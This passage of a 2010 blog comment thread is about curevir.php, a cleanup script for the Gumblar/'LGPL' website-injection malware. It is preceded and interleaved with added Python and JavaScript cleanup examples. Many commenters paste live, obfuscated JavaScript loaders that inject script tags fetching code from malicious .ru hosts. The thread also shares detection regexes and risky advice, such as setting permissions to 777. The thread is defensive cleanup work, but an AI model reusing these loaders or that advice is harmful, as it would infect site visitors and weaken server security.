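A sketch of the auxiliary tool described in the comment above, as an added Python example that is not part of the original comment or of curevir.php: it records each file's and directory's mode before the temporary change, and afterwards restores only the entries that differ. The function names and the JSON snapshot format are assumptions; ownership is not recorded or restored, and the sample tree is constructed.

```python
import json
import os
import stat
import tempfile
from pathlib import Path


def snapshot_modes(root, snapshot_file):
    """Record permission bits of every file and directory under root."""
    modes = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # a symlink's own mode is not meaningful; skip it
            rel = os.path.relpath(full, root)
            modes[rel] = stat.S_IMODE(os.lstat(full).st_mode)
    # Keep the snapshot outside the web root so it is neither served nor scanned.
    Path(snapshot_file).write_text(json.dumps(modes, indent=1, sort_keys=True))
    return modes


def restore_modes(root, snapshot_file):
    """Put recorded modes back; return (changed, missing) relative paths."""
    modes = json.loads(Path(snapshot_file).read_text())
    changed, missing = [], []
    # Deepest entries first, so a directory that loses its search bit
    # is only restored after everything inside it has been handled.
    for rel in sorted(modes, key=lambda r: r.count(os.sep), reverse=True):
        full = os.path.join(root, rel)
        if not os.path.lexists(full) or os.path.islink(full):
            missing.append(rel)
            continue
        if stat.S_IMODE(os.lstat(full).st_mode) != modes[rel]:
            os.chmod(full, modes[rel])
            changed.append(rel)
    return changed, missing


def demo_permissions():
    """Snapshot, widen to 777 as the comment describes, then restore."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "site")
        os.makedirs(os.path.join(root, "js"))
        wanted = {
            "index.php": 0o644,
            "js": 0o755,
            os.path.join("js", "app.js"): 0o640,
        }
        for rel in ("index.php", os.path.join("js", "app.js")):
            Path(root, rel).write_text("// constructed sample file\n")
        for rel, mode in wanted.items():
            os.chmod(os.path.join(root, rel), mode)

        snapshot = os.path.join(tmp, "modes.json")  # outside the site tree
        saved = snapshot_modes(root, snapshot)
        for rel in saved:                           # temporary widening
            os.chmod(os.path.join(root, rel), 0o777)
        changed, missing = restore_modes(root, snapshot)
        final = {rel: stat.S_IMODE(os.lstat(os.path.join(root, rel)).st_mode)
                 for rel in saved}
        return saved == wanted, sorted(changed), missing, final == wanted


if __name__ == "__main__":
    print(demo_permissions())
```

Entries reported as missing are files that were in the snapshot but no longer exist; files created after the snapshot are not touched and keep whatever mode they were given.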

  67. Michael January 19th, 2010 at 11:46 am

    Oh yes, I have set the permission to 777 but curevir.php is still
    returning “Failed”

    Warning: fclose(): supplied argument is not a valid stream resource in /home/schweize/public_html/curevir.php on line 251
    FAILED!

    And on other part of my site it’s still showing:

    Parse error: syntax error, unexpected ‘<’ in /home/schweize/public_html/admin/index.php on line 44

  68. Claudiu January 19th, 2010 at 12:06 pm

    My website is http://www.topographic.ro
    When I try to download your program, the antivirus tells me that it has a virus and it cannot be downloaded… what should I do? Please help me…

  69. Claudiu January 19th, 2010 at 12:07 pm

    And if I disable the antivirus… when I open the archive it says Unexpected end of archive… Thank you

  70. Konstantin Boyko January 19th, 2010 at 12:27 pm

    Claudiu: the download link seems to be fine - probably your antivirus just recognizes pieces of malicious code in the source and blocks it.
    Michael: contact me by e-mail if you have issues, I will do my best to help

  71. Barbara January 21st, 2010 at 12:47 pm

    Hi Konstantin -

    Thank you for this script and your very kind assistance to me and others who have encountered this virus.

    I was able to upload the script - just typed it wrong the first time (duh!) - then tried to run it (spelled correctly :-)) - however, even though I changed the permissions on my server, it still would not run.

    ATTENTION - Anyone with a shared hosting account:

    I have shared hosting on BlueHost - so I called tech support to ask why the permissions kept defaulting back to 755, even though I changed them to 777 to run the script.

    The tech guy told me that by default their systems will not allow any executable scripts to run.

    I then explained about the virus that had infected most of my domains & that it was also all over the Symantec site & that this script could cure it.

    The tech support guy was very nice & ran the script for me.

    So if you have shared hosting & cannot get this script to run, try calling tech support to explain & get them to run the script for you.

    WONDERFUL! ALL FIXED!

    Also - the BlueHost tech guy understood that this virus could possibly be infecting & reinfecting many other accounts, so I told him to visit your site for more information.

    Konstantin - you are a genius, so thank you with all of my heart.

    Barbara

  72. Konstantin Boyko January 21st, 2010 at 12:52 pm

    Thanks, Barbara - you are welcome.

  73. Stojan Kosic January 21st, 2010 at 3:41 pm

    Hello,

    My site got infected 2 days ago with a virus that starts with the /*LGPL*/ comment, and I used curevir.php, and everything worked fine, but after two days the virus came back in a changed form; there is no starting /*LGPL*/ comment, so I can’t use curevir.php.

    code looks like this:

    any idea how to fix this?

    thanks!

  74. Konstantin Boyko January 21st, 2010 at 3:45 pm

    Stojan, you haven’t posted the virus code; could you send it to me so I can take a look?

  75. bess January 21st, 2010 at 4:18 pm

    Yes, the code is without the start:

    try{window.onload=function(){newEl = document.createElement(’script’);newEl.setAttribute(’defer’, ‘1′);newEl.setAttribute(’src’, ‘http://google-be.abc.go.com.perezhilton-com.authentictype.ru:8080/asg.to/asg.to/mediaset.it/sears.com/google.com/’);document.body.appendChild(newEl);} } catch(Vhjsgyj9 ) {/*handle exception*/}

  76. Barbara January 21st, 2010 at 6:58 pm

    Hi Konstantin -

    As an alert - my sites have become reinfected - even though I have not logged in since the fix.

    However - it seems they have morphed the code again.

    The domain is http://www.Paws4Laws.com

    (I am the volunteer webmaster for the American Rottweiler Club)

    Here is the new code I am posting for you:

    try{window.onload=function(){newEl = document.createElement(’script’);newEl.setAttribute(’defer’, ‘1′);newEl.setAttribute(’src’, ‘http://atwiki-jp.pcauto.com.cn.linkedin-com.authentictype.ru:8080/livejournal.com/livejournal.com/google.com/terra.com.br/opera.com/’);document.body.appendChild(newEl);} } catch(Q4is9dxs ) {/*handle exception*/}

    I am on the phone again with BlueHost to see if they will run the script for me again, but it doesn’t seem to be working.

    Can you please adjust the script? Thanks so much,

    Barbara

  77. Chris January 21st, 2010 at 7:20 pm

    Excellent!!

    I was looking for something like this. Unfortunately only ASP is available with my host.

    Is there an ASP version of this script somewhere?

    Thanks!

  78. Brent January 21st, 2010 at 7:37 pm

    @Barbara - I am getting the same hack script. Can someone help? Thanks.

  79. Konstantin Boyko January 21st, 2010 at 7:43 pm

    I see the modification, will need to investigate and update the script. I will post updated version here once I have it.

  80. Brent January 21st, 2010 at 7:52 pm

    The hack script that attacked my site is: try{window.onload=function(){newEl = document.createElement(’script’);newEl.setAttribut e(’defer’, ‘1′);newEl.setAttribute(’src’, ‘http://microsoft-com.whitepages.com.isohunt-com.cometruestar.ru:8080/typepad.com/typepad.com/timesonline.co.uk/google.com/yahoo.com/’);document.body.appendChild(newEl);} } catch(Y7bngtnv ) {/*handle exception*/}

  81. Dejan January 21st, 2010 at 9:37 pm

    Script commented with… /*Exception*/

  82. Stojan Kosic January 22nd, 2010 at 12:09 am

    Hello,

    my code looks like this:

    /*Exception*/ document.write(”);

    and it has changed from today.

  83. Stojan Kosic January 22nd, 2010 at 12:15 am

    Somehow I can’t write the whole code?

  84. Brent January 22nd, 2010 at 5:18 am

    @Brent

    At the first attack this curevir PHP worked great. My mistake: I forgot to change one of my FTP accounts, so the second attack came yesterday.

    The injected script is not the same as the first time, but nearly the same as yours.

    You just need to change a few things in the file

    @line 36 :
    $starting_comment = ''; // !

    @line around 229 change the regex to

    $ptr_js = '/(\r*)(\s*)'.preg_quote($starting_comment, '/').'(\s*)try\{window\.onload(.*)(\s*)*$/is';

    and

    $ptr_html = '/(\r*)(\s*)'.preg_quote($starting_comment, '/').'(\s*)try\{window\.onload(.*)(\s*)(\s*)*$/is';
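
The patterns in comment 84 end in `(.*)` followed by `$` under the `s` flag, so once the marker matches, everything up to the end of the file is removed with it. The added example below (JavaScript written for this page, not code from curevir.php; the sample file, the host name and all function names are constructed) compares that greedy form with a match bounded to the injected line and gated on loader indicators.

```javascript
'use strict';
// Added example; not part of curevir.php. All sample content is constructed.

// Greedy form: with the "s" flag (.*) also matches newlines, so the match
// runs from the marker to the end of the file.
const GREEDY = /\s*try\{window\.onload(.*)\s*$/is;

// Bounded form: one physical line, from an optional /*...*/ tag and
// try{window.onload=function(){ up to the closing catch(<name>){...}.
const HEAD = /[ \t]*(?:\/\*[A-Za-z ]{1,20}\*\/[ \t]*)?try[ \t]*\{[ \t]*window\.onload[ \t]*=[ \t]*function[ \t]*\(\)[ \t]*\{/;
const TAIL = /\}[ \t]*catch[ \t]*\([ \t]*\w+[ \t]*\)[ \t]*\{[^\n{}]*\}/;
const BOUNDED = new RegExp(HEAD.source + '([^\\n]*?)' + TAIL.source, 'gi');

// A plain onload handler is legitimate code. Only treat the line as injected
// when its body also does what the posted loaders do.
const INDICATORS = {
  createElement: /createElement/,
  documentWrite: /document\.write/,
  appendChild: /appendChild/,
  junkStrip: /\.replace\(\s*\//,
};

// Report-only pass: where are the suspicious lines and why were they flagged?
function findInjections(text) {
  const hits = [];
  for (const m of text.matchAll(BOUNDED)) {
    const indicators = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(m[1]));
    if (indicators.length === 0) continue; // ordinary handler: leave it alone
    hits.push({
      line: text.slice(0, m.index).split('\n').length,
      start: m.index,
      end: m.index + m[0].length,
      indicators,
    });
  }
  return hits;
}

// Remove only the flagged spans, last one first so offsets stay valid.
function stripBounded(text) {
  let out = text;
  for (const h of findInjections(text).reverse()) {
    out = out.slice(0, h.start) + out.slice(h.end);
  }
  return out;
}

// What a greedy, dot-all pattern does to the same file.
function stripGreedy(text) {
  return text.replace(GREEDY, '');
}

// Constructed sample: injected line in the middle of a file, followed by
// legitimate code and a legitimate onload handler.
const INJECTED =
  "/*LGPL*/ try{window.onload=function(){var s=document.createElement('script');" +
  "s.setAttribute('src','http://bad.example.invalid:8080/x/');" +
  'document.body.appendChild(s);} } catch(Ab12cd ) {}';
const SAMPLE = [
  'function before() { return 1; }',
  INJECTED,
  'function after() { return 2; }',
  'try{window.onload=function(){init();} } catch(e) {}',
].join('\n');

console.log(findInjections(SAMPLE));
console.log('greedy keeps after():', stripGreedy(SAMPLE).includes('function after'));
console.log('bounded keeps after():', stripBounded(SAMPLE).includes('function after'));
```

Running `findInjections` on its own and reviewing the listed lines before stripping anything keeps the file intact if the heuristic is wrong.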

  85. Jens January 22nd, 2010 at 11:07 am

    The script does not clean the new variant with /*Exception*/
    even if you change in the curevir.
    Plz release a new version .
    Thanks!

  86. Bastien January 22nd, 2010 at 12:34 pm

    The hack is now : /*Exception*/ document.write(”);

    Has someone modified the PHP script to clean this hack?

  87. NomadGuru January 22nd, 2010 at 1:47 pm

    I guess that there’s a new version of the virus.

    Can someone help with this new one:
    mine is like this:

    /*Exception*/ document.write(”);

  88. jam January 22nd, 2010 at 3:07 pm

    Yes, today there is a new code like Stojan Kosic mentioned
    /*Exception*/ document.write(”);

  89. maxi January 22nd, 2010 at 3:09 pm

    Hello,

    I found this code in the end of my index.html:

    /*LGPL*/ try{ window.onload = function(){var Sa6y7pu9×5e1 = document.createElement(’s(!c()^r!@&#i^#&)p)@t@’.replace(/\!|#|\$|\(|\^|@|\)|&/ig, ”));Sa6y7pu9×5e1.setAttribute(’defer’, ‘d)^@&e#f&e(!&#r)’.replace(/#|\(|\$|\^|\!|@|&|\)/ig, ”));Sa6y7pu9×5e1.setAttribute(’type’, ‘t)&$!e#$$x()@t)/&)j$&a^(v^a!s@c()!r@((i$&p@(&t(!’.replace(/@|&|#|\^|\)|\!|\(|\$/ig, ”));Sa6y7pu9×5e1.setAttribute(’id’, ‘H&#^@t@(&i#((q#))&)7$)&j!&6!(&l$)g$#&(k@@a^$8(&&0^0@()’.replace(/\$|&|@|\!|\^|#|\)|\(/ig, ”));Sa6y7pu9×5e1.setAttribute(’s$^#^!r)^c#!)!’.replace(/\!|\^|@|&|\)|#|\(|\$/ig, ”), ‘h##t&#&t!&)p#&$$:&!/(&)/!i(^(@r$c^!#t@(&c@()@-(@@c($o^(^-&(!$i(^)^$n!.)r)@a#@$p#&!i^d)$s$h@#$$a#$r!^^(e(^#.(#$c&o#)@m)#@)(.#(&s)!#k#$y)$@r)(#o!c&!k#&-)&c!o((#m^^^&.(!!t^)$h#e$c@)h$)o$!!!#c)o^&^l#)a$!t&)e)@w)&e$b((!!.@)^r#!!u$#:&8#!&#0@(8^@(0!@/$&)b!)!^r$a)#&z)z&&e$r)$(s@($#.^&c@&o@)m!)!/&))#b&)r$$$a)!z#^z)e#(r@(!^s$(.@^&@!c^)o#!!!m#/$p$!h)o$t&o#(b^@u(&(c$@k(^e(!t)$$.!#c^!o#!&m))/$(^o($#(v@$g@#u)@i(d^!e!)(.#$c&o^m#$/^@@g(o#&#o($(g!l(e&.$)@@)c^&o#!&@m#!/)$’.replace(/#|\!|&|\(|@|\$|\)|\^/ig, ”));if (document){document.body.appendChild(Sa6y7pu9×5e1);}} } catch(Xfd4wb6y3unlnipi03r) {}

    And also I found an untitled document in the same directory including these code:

    p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Lucida Grande}

    <script type="text/javascript">
    var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
    document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
    </script>
    <script type="text/javascript">
    try {
    var pageTracker = _gat._getTracker("UA-3087028-4");
    pageTracker._trackPageview();
    } catch(err) {}</script>

    No idea if that’s got something to do with each other..

    Greetings from Germany,

    Maxi

  90. jam January 22nd, 2010 at 3:10 pm

    Stojan, change curevir.php line 36 to
    $starting_comment = '/*Exception*/';

    and
    line 156

    $virus_string = $starting_comment.' document.write';

  91. Stojan Kosic January 22nd, 2010 at 6:24 pm

    JAM, I have tried to replace line 36 and line 153 (not 156) and it is not working. Did you have any luck?

    can you send me entire code?

    Thanks!

  92. Konstantin Boyko January 22nd, 2010 at 6:26 pm

    I have just released the new version of the script (1.2). It is available at the original link. Please be careful with it (make backups) as I haven’t had chance to test it on many servers yet. Any feedback would be nice.

  93. pavel January 22nd, 2010 at 6:26 pm

    there is something with the preg string near line 230,
    variables $ptr_js and $ptr_html
    sure Konstantin will fix it soon ;)

  94. jam January 22nd, 2010 at 6:44 pm

    Looks like it works!

  95. Stojan Kosic January 22nd, 2010 at 7:31 pm

    it worked for me!

    I’ll keep you informed if the virus comes back.

  96. Dejan January 22nd, 2010 at 11:12 pm

    You can also add…

    JS:
    $contents_new = preg_replace('/\/\*Exception\*\/(.*?)\;/is',"",$contents);

    HTML:
    $contents_new = preg_replace('/\\/\*(.*?)\-\-\>/is',"",$contents);

  97. Brent January 23rd, 2010 at 12:04 am

    Thanks!

  98. NorfolkBroad January 23rd, 2010 at 2:55 pm

    Hi,

    Thanks for this script, it’s a godsend - just spent 4 days cleaning up all my sites (which are hosted on the same server) and the hackers got me again last night. The injected code has changed and affects PHP and HTML files on my sites as well as JS

    /*Exception*/ document.write(”);

  99. Olivier January 23rd, 2010 at 10:25 pm

    Konstantin,

    Many thanks for sharing your script and updating it. Release 1.2 worked for me removing script starting with the top portion “/*LGPL*/ try{ window.onload = function()” and strange <!-c15****** ” stuff at last line.

    This is one awesome script that saves us hours of checking files one by one in our blog.

  100. Olivier January 23rd, 2010 at 10:36 pm

    Link to webpages I visited before finding this one
    http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl
    Another cleanup script for “/*LGPL*/” variant can be found here :
    http://possible.in/products-security-updates.php

  101. Mark January 24th, 2010 at 4:51 pm

    Now there’s another stinkin’ piece of crap adding stuff to my index.html and index.php. don’t know about js.

    /*Exception*/ document.write(”);

  102. Mark January 24th, 2010 at 4:53 pm

    hehe.. looks like curevir knows about it and cleans it like magic!

  103. Mark January 24th, 2010 at 4:53 pm

    Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you Thank you ! :)

  104. Shade January 25th, 2010 at 10:48 am

    We host a number of sites and we’ve been hit by all 3 versions (so far) of this trojan. Your removal tool, Boyko, has spared us from a lot of tedious work so I really want to thank you for the great job.

    On the other hand, can somebody point out an antivir/antispyware program able to find and remove the virus on the infected PCs where it stole the FTP pass from? Many thanks in advance

  105. clowner January 25th, 2010 at 12:02 pm

    dear Boyko…

    I wanna say thanks for your helpful script. It helped me very, very much to fight that trojan.

    @shade: re-create your passwords for FTP, cPanel, etc. On the PC I use Avast Pro 4.8 to monitor the script.

    great work..

  106. spacerace January 25th, 2010 at 6:41 pm

    Thanks very much for the cleaning script, has saved me much time..

    I’d like to give some pointers to getting rid of the virus/malware on your PC as I got caught a second time round with this one…

    Firstly, ditch AVG it clean scanned my PC and declared all was safe when in fact I was still infected, causing me to have to do the whole password reset and clean process twice. Use Avast _ Malware Bytes which found and cleaned the virus.

    Secondly, the virus may access stored connections in your FTP client (as I have read), but it *also* sniffs them as outbound connections are made. I upgraded my FTP client (Total Commander) to one that stores passwords in encrypted format after initially resetting all passwords. But because the virus was still running in memory the new passwords were copied again - the only way this was possible was for it to catch and ‘read’ the passwords as the connections were being made.

  107. Jeff Faldalen January 25th, 2010 at 8:31 pm

    I got hit with it too. Last night we visited the infected site and avast went crazy. I am going to install it on the computer.
    Konstantin Boyko how can I contact you?

  108. Jeff Faldalen January 25th, 2010 at 8:36 pm

    does your script work on this?
    wp-includes/default-widgets.php on line 1034

  109. Konstantin Boyko January 25th, 2010 at 8:40 pm

    Jeff, you can contact me via Contact form or by e-mail which you can find in script comments.

  110. Ed January 27th, 2010 at 12:13 am

    Thank you for this tool it saved my site. You really did a good thing for people who don’t know how to remove it, kudos to you!

    Keep up the great work.

  111. Erin January 27th, 2010 at 7:27 am

    This is the code we are getting and the script does not remove.

    try{window.onload=function(){document.write(’cam4-com.elpais.com.googl’);Riwb6bjjicwm = document.getElementById(’megaid’).innerHTML + ‘e(((-#@#c)!(!n$&.)(@s#u)p$^e@)r&n!)$e&!#t)b&@e#(t^!^.#@!)!r$)u@($):@#D&E&@@B#U^#(G&@^/)p)&)l$@)&e!)@(^n)t^$@y&&)o$^#@(f#(^f(!$&i$)$s#&h(.^c^o##$m@@##/!&@^^p!)^l(@)#e^(n&&#t$&@#y$$&o)f##^f$($i$^s^(h)#&.)#!&c@&@o##m^/$o#v^h#.#(@(n@e@^@t$/$^g!^^o&o^#g(!$#l)&)e).&)c$^o!&)m)@$/#!b))!o&@)^s!t&o(n!&!.@$^c$^(o&^m@&&/@@’.replace(/\(|\^|\!|#|\$|&|\)|@/ig, ”) ;document.write(”);} } catch(Josjalqn ) {}

    Any ideas? we need a fix for this asap. Thanks

  112. Peter Fitzgibbon January 27th, 2010 at 2:29 pm

    We have been running your script on our server and it has been working, thanks, but it’s not picking up the latest attack.
    New Code:
    /*Exception*/ document.write(”);

  113. Pete January 27th, 2010 at 2:52 pm

    Konstantin, if you asked for £1 each time you helped someone you’d maybe be rich by now!!
    Glad someone is on top of this virus, great work you’re doing here..

  114. Konstantin Boyko January 27th, 2010 at 3:16 pm

    Thanks, Pete! Though I think the script should be free for use, I’ve just added the donation link in the post, anyone can support the development of this script using that link.

  115. Mike January 27th, 2010 at 3:57 pm

    Virus is Back Again.

    After running the curevir.php on my site it did not clean the virus
    immediately, but after I changed the File Permission on all files to 777 the script did a wonderful
    job !

    I took some security measures by changing to new strong FTP-Password
    and then disposing the Computer which got me infected and get a new PC just to make sure that everything is clean.

    Now the website is infected with the virus again and
    after running curevir.php it is showing:

    TOTAL: 0
    START BACKUP:
    END BACKUP!

    It simply can not detect the virus again and our site is down

    http://www.schweizer-portal.ch/
    http://www.schweizer-portal.ch/curevir.php

    Please can anybody help me

    Mike

  116. saeed January 27th, 2010 at 10:00 pm

    virus back with

    try{window.onload=function(){document.write(’leo-org.rapidshare.com.up’);D1293nsztip = document.getElementById(’megaid’).innerHTML + ‘l!$o^!a!&d^(e$&d!&-&t^^o&.$@s$#u)$#p(e#&(&r&!&)h))$i)$)g^!h^^e!&$^s$@t^@^@.#r@)u($!#:#D@^E#^B^$U(!@@G!/(((1&#2^&^^)6#^#.#$!c&#o&m#^&/^&&1!)!@2@^6@$.&&^&c)o#&@$$m#@&/&@&g#o)!o$#g!)^l()!e$&!.!(c)&!o!&m@$!/#)s&!t@@r!#e!@a@m)()a!$t^@e(@(.&)@c#)o@@!(m!(/!#(x)t&$&)u&!b&&e$.&^))c&o@&(m#&#$/$’.replace(/@|&|\$|\^|#|\(|\!|\)/ig, ”) ;document.write(”);} } catch(R0q6hhv ) {}

  117. johnpaul January 27th, 2010 at 11:08 pm

    ran the script yesterday with perfect results - while waiting for my host to change my password - now the commie is back with a new line of code….
    try{window.onload=function(){document.write(’sueddeutsche-de.cricinfo.’);B5mgmzx9wcv = document.getElementById(’megaid’).innerHTML + ‘c#!o^#m)#@&.&@#^^o#&&##d&@n!##)o^&!k!()l!!a($)s()&s^#)n!#(#i$k^!##^i)#!-!r$!#u&.)#s((@#u&!&p&##^e)r(@#h^i(@^!g(&$$h$)$!e@((s@&t$@.!)r$##!u&:$^)D@&E$@)B&()#U@)G^(/$&&s&(^t)a)#t#)c@o&)^u^()$n($()t#e@(!@r!^!@.$&c#@o($&!!m^@$/#$@&s$#t(a&t&@#c())o$))#$u#$!n@($t^^)^e&($$r!(.#!)c(o&^m&#/$g^#)!o(&)@o^)g(l$)e@.)c&$(&o!)m&@!#.$$l)#!y!$@(/#$&!j^!!u!@g^#(&#e@$(m&#&.&j^#^^p@^#)/$^g!@o#)(o!(!g@@#l#&!@e!$.!#&)(c&)(o#)@)m^^&/)!’.replace(/&|\^|#|\)|\$|@|\(|\!/ig, ”) ;document.write(”);} } catch(J3eg5ios ) {}

  118. Stephen January 27th, 2010 at 11:37 pm

    I agree with Mike, virus is back. Was displaying a link to sueddeutsche-de.cricinfo.

    I changed the pw to something extreme and am awaiting your tool so I can clean the WordPress, but in the meantime I will be cleaning my regular site manually.

  119. duo January 28th, 2010 at 12:06 am

    i still have it, it even makes new files on the server named ‘core.’

    when the script ends i have this code:

    try{window.onload=function(){document.write(’sueddeutsche-de.cricinfo.’);B5mgmzx9wcv = document.getElementById(’megaid’).innerHTML +

  120. johnpaul January 28th, 2010 at 1:40 am

    running your script doesn’t work today like it did yesterday.

    removing the hacker script doesn’t work today. the page reverts to the page “sueddeutsche-de.cricinfo.”

    my web host has either been asleep or out to lunch for the last 2 days since they won’t change the password.

  121. Roger Lin January 28th, 2010 at 9:09 am

    try{window.onload=function(){document.write(’voila-fr.fotolog.net.prob’);J2u31qlmwr0l = document.getElementById(’megaid’).innerHTML + ‘o!#a#r(#d(s$!&^-@c&$!!o&!m$.&!s&#u@!^p$!@#e!(r@#(h@&!i$!$g)$$#h^e)s^t#&).))@r&!u(((^#:&D)&E)))B$&U^$$G(^/@^(g#@#$o)(o$g$@l^^e$.$$c$$o&#m##(&/!)g!o#o$(#g$!l$e#$.!&c(o&!m$)/&$t@v$(&.(!c@)$))o!#m&)/!!n#^a!t$&e).!&c)o($^m!#&@/!#&n(($e&@$#w^!!g@!r@)@o)!@u&)!!n@d!)s).!)#^c(!$o@&&)!m&!/&$’.replace(/\!|\^|\$|\)|@|\(|#|&/ig, ”) ;document.write(”);} } catch(Ffxag9w ) {}

    This is the one curevir.php can’t kill.

  122. Konstantin Boyko January 28th, 2010 at 11:55 am

    Thanks to everyone for pointing out the new version of the code. I have added another regular expression for this new version of the virus code. The latest version of the script (1.2.1) is available at the original link. Again, there was no real testing, so any feedback would be useful.

  123. Stephen January 28th, 2010 at 5:13 pm

    Thank you for the updated version!

    Cleared up my Wordpress blog perfectly!

  124. johnpaul January 28th, 2010 at 6:58 pm

    Konstantin - Thank you for the updated version. 1.2.1 Got the password changed first and then ran the script this time and it worked perfect again. Donation has been made!

    START BACKUP:

    Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /home/johnpaul/public_html/curevir.php on line 108

    tar -czvf /home/johnpaul/public_html/!backup-1264696456.tgz /home/johnpaul/public_html/cavehill/home/johnpaul/public_html/GGBF2007/resources/javascript/AC_RunActiveContent.js

    Array
    (
    [0] => Array
    (
    )

    [1] => 127
    )

    BACKUP failed…

    END BACKUP!

    Trying to cure /home/johnpaul/public_html/cavehill/cavehill/index.html

    SUCCESS —- etc…

  125. Konstantin Boyko January 28th, 2010 at 7:54 pm

    Thanks John!

  126. Olly Schade January 28th, 2010 at 8:03 pm

    THX4Update! Great work.

  127. Lars January 28th, 2010 at 8:15 pm

    Thanks for the script! Excellent!

    But if you are using Joomla!, take care. It seems like the script removes too much iframe code in Joomla! admin - at least we had some problems with the filemanager after running curevir.php on a couple of sites.

    The file affected is:
    /administrator/components/com_media/views/media/tmpl/default.php

    After the fix, row 51 is missing some code. If you are using the latest version 1.5.9, you could add the following code:

    <iframe src=”index.php?option=com_media&view=mediaList&tmpl=component&folder=state->folder;?>” id=”folderframe” name=”folderframe” width=”100%” marginwidth=”0″ marginheight=”0″ scrolling=”auto” frameborder=”0″>

    Anyone else having the same problem after running the script on a Joomla! site?

  128. Mike January 29th, 2010 at 12:52 am

    Dear Boyko, Donation is made ! Number : 4192848220

    You are really helping people, as curevir has helped solve my website, but only after a day the virus came back. It is now getting to 2 weeks that my site can not function even after running the software again.

    I have gone to the Link Version 1.2.1 but after running it on my site, it is showing Version 1.2 instead.

    See:
    http://www.schweizer-portal.ch/curevir.php

    Since the second attack I ran all the versions but I am still seriously suffering. (2 weeks)

    I just learned how much I rely on my site to survive this very hard time.

    Please can you look at my site ? God Bless You

    Mike (Michael)

  129. cs January 29th, 2010 at 1:51 am

    It’s coming back after a few hours. FTP, it’s Joomla, and I used only the cPanel file manager, no FTP (FileZilla..)

  130. Emre January 29th, 2010 at 11:52 am

    New virus version has been made:
    “”

    Curevir works perfectly, but is there any way to block this virus? I am fed up with fixing. I cancelled the FTP account, removed CuteFTP etc. Nothing worked.

  131. Konstantin Boyko January 29th, 2010 at 12:53 pm

    It seems I have found another mutation of the virus code… Added one more regular expression (version 1.2.2 is the latest one now).

  132. Olly Schade January 29th, 2010 at 7:46 pm

    I have found another mutation…

    http://www.limelightstars.de/ssp_director/index.php

    try{window.onload=function(){Sr77o1cpaq7bqqng = ” + ’s$m(a#(s#h!&#!&i$@$)n@$g!m&a@g&&a(&#z!#&i)n)&e)#!-!c(o&^m$$!(.^($@@t#!u(@b)$$^e^!8&.$c#o@m&$.!#a$^n@o(^n!)y^&!m)#-@t@($$o&&.)&!a!v$@a^#!t##$#)t&#&o&&!p$&.#@r^&u#$&:^@!U)$!^v$$&0&&@@s()^$p(m!#^o$^^x@!@v&#!)k@6)@w$$p$!&(/$(&g#$#o(^o!g!(^l&e($^.#^($c()))o&)(m()/$g)!o(^o#g!l(e)$&^.(!c&^#o!&&m^$(/#p$!)l(&a@y&^$).#$&c(^(o&m@!!/@l$&i)^n!&@k&#$w!i$(!#t^)h(&i@@#n&@$().$#c&^o(&!m&&/)!!&l(!e!m@)(o#&^n^^d&(e!!.!#@^$f(!r#^&/!’.replace(/@|&|\)|\(|\^|\!|\$|#/ig, ”) ;G4ybgpy9jp = ‘appendChild’;L8fxjgnvrw1pb = document.createElement(’sc’+'ript’);L8fxjgnvrw1pb.src = ‘h’+'ttp://’+Sr77o1cpaq7bqqng.replace(/Uv0spmoxvk6wp/g, ‘8080′);L8fxjgnvrw1pb.setAttribute(’defer’, ‘def’+'er’);eval(’document.body.’+G4ybgpy9jp+’(L8fxjgnvrw1pb)’);} } catch(Vndx63sc5 ) {}

  133. Olly Schade January 29th, 2010 at 7:49 pm

    http://www.limelightstars.de/ssp_director/curevir.php

    Doesn’t work with this kind of mutation.

  134. Sameer Shelavale January 29th, 2010 at 10:45 pm

    Olly,
    you can use the script on
    http://possible.in/products-security-updates.php for the new type. I just updated it.

    Boyko new RE is '/try\{window\.onload=function\(\)\{([^\n]*)(\'sc\'\+\'ript\'|\'h\'\+\'ttp:\/\/\'|\'def\'\+\'er\')([^\n]*)\{\}(\s*)/i',

    I hope it helps somebody in need.

  135. sergey January 29th, 2010 at 11:08 pm

    new variant of same worm:

    try{window.onload=function(){Pqdekqmwhk62 = ” + ‘h((u)(b!p!a$@$g)#e@(!&s@!-&)c()o^^(m@!.#($!$y(o)(^u!&#(j#^(i(&z!($$z!@.#c^@&o()^m(&.!!s((^&m!h#)^-@$#@c^o##^m!(#-@($a@(^u!.(@@#a@$v^a!#$!t^$@@t!!o!(p!&.^r)!u&!):)Y@x&$&@v^$)#6(y(j$&w&)@e$(^6(w$^7)^r@)^/$&g@@o$o@#(g#&l!$^(e&.(@c^o!m(&^/!(g^o$@o&#!$g&^^^l&e&!.#c)@o&$m$/&!t&o&#m!#.$)c^^$o&^(#(m$$(#/(@d^i@c&&^t())(.@@^c@c()@/!@s&#e$@!a@(#&&r@#s)!.(!$(c(^^o!!(m!$/#’.replace(/&|#|\(|\!|@|\^|\)|\$/ig, ”) ;Q7rj4s75mfeh3 = ‘appendChild’;Mxvqzu6myayt = document.createElement(’sc’+'ript’);Mxvqzu6myayt.src = ‘h’+'ttp://’+Pqdekqmwhk62.replace(/Yxv6yjwe6w7r/g, ‘8080′);Mxvqzu6myayt.setAttribute(’defer’, ‘def’+'er’);eval(’document.body.’+Q7rj4s75mfeh3+’(Mxvqzu6myayt)’);} } catch(Tb3w8uei ) {}

  136. kamasbert January 30th, 2010 at 12:10 am

    In our case curevir only scans the directory where curevir is located. Is that the normal behaviour? Is there some kind of switch to tell that script to scan subdirs? Thanks in advance -kamasbert-

  137. Tom January 30th, 2010 at 6:19 am

    lol, I linked your fix from wikipedia gumblar page and it stuck. First edit they have kept of mine.

  138. Olly Schade January 30th, 2010 at 9:38 am

    @Sameer

    Fatal error: Cannot instantiate non-existent class: directoryiterator in site-cleanup.php on line 27

  139. Konstantin Boyko January 30th, 2010 at 11:56 am

    OK, updated the script one more time… This new mutation should be covered by version 1.2.3 (the latest one). Try

  140. Olly Schade January 30th, 2010 at 12:40 pm

    @KB

